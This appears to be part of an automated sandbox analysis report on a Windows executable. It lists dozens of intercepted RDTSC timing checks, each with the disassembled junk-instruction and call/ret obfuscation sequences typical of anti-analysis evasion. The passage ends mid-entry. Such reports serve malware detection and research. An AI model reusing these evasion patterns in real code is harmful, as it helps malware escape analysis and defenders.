Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F896D8 second address: F896DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F896DC second address: E01BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5B529A18h 0x0000000f movsx ecx, cx 0x00000012 push dword ptr [ebp+122D00B9h] 0x00000018 xor cx, A046h 0x0000001d call dword ptr [ebp+122D178Ch] 0x00000023 pushad 0x00000024 jmp 00007F5AD8CCD66Dh 0x00000029 xor eax, eax 0x0000002b pushad 0x0000002c sbb di, CCF1h 0x00000031 cmc 0x00000032 popad 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 push ecx 0x00000039 pop edx 0x0000003a mov dword ptr [ebp+122D32C7h], edx 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D3890h], eax 0x00000047 mov dword ptr [ebp+122D32C7h], esi 0x0000004d jns 00007F5AD8CCD66Ch 0x00000053 add dword ptr [ebp+122D2466h], eax 0x00000059 mov esi, 0000003Ch 0x0000005e jbe 00007F5AD8CCD672h 0x00000064 jnl 00007F5AD8CCD66Ch 0x0000006a jne 00007F5AD8CCD666h 0x00000070 add esi, dword ptr [esp+24h] 0x00000074 mov dword ptr [ebp+122D32C7h], edi 0x0000007a lodsw 0x0000007c cmc 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 cmc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 mov dword ptr [ebp+122D2466h], edx 0x0000008d push eax 0x0000008e pushad 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007F5AD8CCD677h 0x00000096 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F8971B second address: F897AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jno 00007F5AD8CCF449h 0x0000000e nop 0x0000000f or dword ptr [ebp+122D1AA1h], edi 0x00000015 and ecx, dword ptr [ebp+122D1AA1h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F5AD8CCF438h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 pushad 0x00000038 jnc 00007F5AD8CCF43Ch 0x0000003e push ebx 0x0000003f mov ecx, 45FD6C9Dh 0x00000044 pop ebx 0x00000045 popad 0x00000046 mov edi, dword ptr [ebp+122D37B4h] 0x0000004c call 00007F5AD8CCF439h 0x00000051 pushad 0x00000052 jmp 00007F5AD8CCF447h 0x00000057 push eax 0x00000058 push edx 0x00000059 je 00007F5AD8CCF436h 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F897AC second address: F897C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F897C0 second address: F89844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F5AD8CCF444h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jl 00007F5AD8CCF43Ah 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F5AD8CCF445h 0x00000024 pop eax 0x00000025 jmp 00007F5AD8CCF442h 0x0000002a mov edx, dword ptr [ebp+122D3ACCh] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D1F7Ah], eax 0x00000038 push 00000000h 0x0000003a sub ch, FFFFFFD2h 0x0000003d push 00000003h 0x0000003f pushad 0x00000040 mov eax, 424C95B8h 0x00000045 popad 0x00000046 push AAF4A1C0h 0x0000004b pushad 0x0000004c jnl 00007F5AD8CCF438h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89844 second address: F89887 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AD8CCD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 6AF4A1C0h 0x00000012 or dl, FFFFFF99h 0x00000015 lea ebx, dword ptr [ebp+1245B628h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007F5AD8CCD668h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 cld 0x00000036 push eax 0x00000037 je 00007F5AD8CCD683h 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 pop esi 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89916 second address: F89924 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89924 second address: F899C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD678h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 387C1E5Bh 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F5AD8CCD668h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov dh, 30h 0x0000002d push 00000003h 0x0000002f mov cx, si 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 cmc 0x00000036 mov ecx, dword ptr [ebp+122D3828h] 0x0000003c popad 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F5AD8CCD668h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xor edi, 59D5F062h 0x0000005f push F5C6E363h 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F5AD8CCD679h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F899C0 second address: F899C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F899C4 second address: F89A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F5AD8CCD66Dh 0x0000000c pop esi 0x0000000d popad 0x0000000e xor dword ptr [esp], 35C6E363h 0x00000015 pushad 0x00000016 mov ebx, 440CA315h 0x0000001b pushad 0x0000001c mov dx, 1018h 0x00000020 mov esi, dword ptr [ebp+122D3667h] 0x00000026 popad 0x00000027 popad 0x00000028 lea ebx, dword ptr [ebp+1245B631h] 0x0000002e add dword ptr [ebp+122D1F54h], eax 0x00000034 xchg eax, ebx 0x00000035 jnl 00007F5AD8CCD67Dh 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f je 00007F5AD8CCD666h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA93AD second address: FA93B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA93B3 second address: FA93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5AD8CCD66Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA951F second address: FA9523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9523 second address: FA952C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA952C second address: FA953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA983B second address: FA9841 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA999D second address: FA99A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9EC6 second address: FA9ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9ECA second address: FA9ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9ED0 second address: FA9ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1A3 second address: FAA1D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5AD8CCF43Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F5AD8CCF441h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1D0 second address: FAA1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1D8 second address: FAA1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1DE second address: FAA1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jc 00007F5AD8CCD666h 0x0000000c je 00007F5AD8CCD666h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA362 second address: FAA37E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AD8CCF436h 0x00000008 jmp 00007F5AD8CCF442h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA37E second address: FAA385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F823A6 second address: F823DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5AD8CCF43Ch 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007F5AD8CCF449h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 jg 00007F5AD8CCF436h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAD98 second address: FAADE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD676h 0x00000007 jmp 00007F5AD8CCD66Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F5AD8CCD66Eh 0x00000014 jl 00007F5AD8CCD666h 0x0000001a push edx 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5AD8CCD671h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAADE0 second address: FAAE04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F5AD8CCF436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5AD8CCF43Bh 0x00000015 pushad 0x00000016 popad 0x00000017 je 00007F5AD8CCF436h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAE04 second address: FAAE0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAE0E second address: FAAE12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFA8 second address: FAAFAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6C9FE second address: F6CA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6CA04 second address: F6CA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAFE98 second address: FAFEB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB11E8 second address: FB11ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB23FD second address: FB2401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2401 second address: FB241C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5AD8CCD671h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB241C second address: FB2426 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB647F second address: FB6493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jmp 00007F5AD8CCD66Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB68D7 second address: FB68DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB68DD second address: FB68E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6B84 second address: FB6BAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F5AD8CCF43Eh 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6BAA second address: FB6BD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5AD8CCD675h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jo 00007F5AD8CCD66Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBAC9D second address: FBACA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBACA1 second address: FBACAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBACAB second address: FBACCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a jl 00007F5AD8CCF43Bh 0x00000010 mov esi, 6CC2C3FAh 0x00000015 nop 0x00000016 push ebx 0x00000017 pushad 0x00000018 jns 00007F5AD8CCF436h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB2B4 second address: FBB2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB2BA second address: FBB2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB2BF second address: FBB2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB82F second address: FBB839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD269 second address: FBD283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCD66Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD283 second address: FBD2C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5AD8CCF43Eh 0x00000008 jmp 00007F5AD8CCF43Ah 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 pushad 0x00000012 add dword ptr [ebp+1245B750h], eax 0x00000018 popad 0x00000019 mov si, A6C4h 0x0000001d push 00000000h 0x0000001f sbb esi, 144697FCh 0x00000025 push 00000000h 0x00000027 mov si, di 0x0000002a movsx esi, bx 0x0000002d xchg eax, ebx 0x0000002e push ecx 0x0000002f jns 00007F5AD8CCF43Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD2C8 second address: FBD2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F5AD8CCD66Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AD8CCD674h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDDE3 second address: FBDDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDB9C second address: FBDBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBA0 second address: FBDBAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBAA second address: FBDBB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBB0 second address: FBDBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDBB4 second address: FBDBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF3CA second address: FBF44C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF440h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F5AD8CCF438h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F5AD8CCF438h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov edi, 0E3B48F2h 0x00000045 sub dword ptr [ebp+122D2DC5h], ebx 0x0000004b push 00000000h 0x0000004d or esi, 14A59150h 0x00000053 xchg eax, ebx 0x00000054 jmp 00007F5AD8CCF440h 0x00000059 push eax 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d jp 00007F5AD8CCF436h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC080A second address: FC080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC44BE second address: FC44C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5AD8CCF436h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC44C8 second address: FC44CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC499F second address: FC49C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF43Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F5AD8CCF43Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC4A66 second address: FC4A84 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5AD8CCD66Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AD8CCD66Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5A0D second address: FC5A17 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5AD8CCF436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC69FC second address: FC6A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6A00 second address: FC6A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6A06 second address: FC6A2F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5AD8CCD676h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jno 00007F5AD8CCD668h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9B0F second address: FC9B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F5AD8CCF43Ah 0x0000000b nop 0x0000000c mov edi, 66F2B8CDh 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D248Dh] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jmp 00007F5AD8CCF444h 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9B4D second address: FC9B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCBD25 second address: FCBDE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AD8CCF444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5AD8CCF442h 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F5AD8CCF43Fh 0x00000015 nop 0x00000016 sub dword ptr [ebp+12461B47h], edi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F5AD8CCF438h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov dword ptr [ebp+124574BDh], edx 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007F5AD8CCF438h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a xchg eax, esi 0x0000005b jnp 00007F5AD8CCF449h 0x00000061 jmp 00007F5AD8CCF443h 0x00000066 push eax 0x00000067 push edi 0x00000068 push 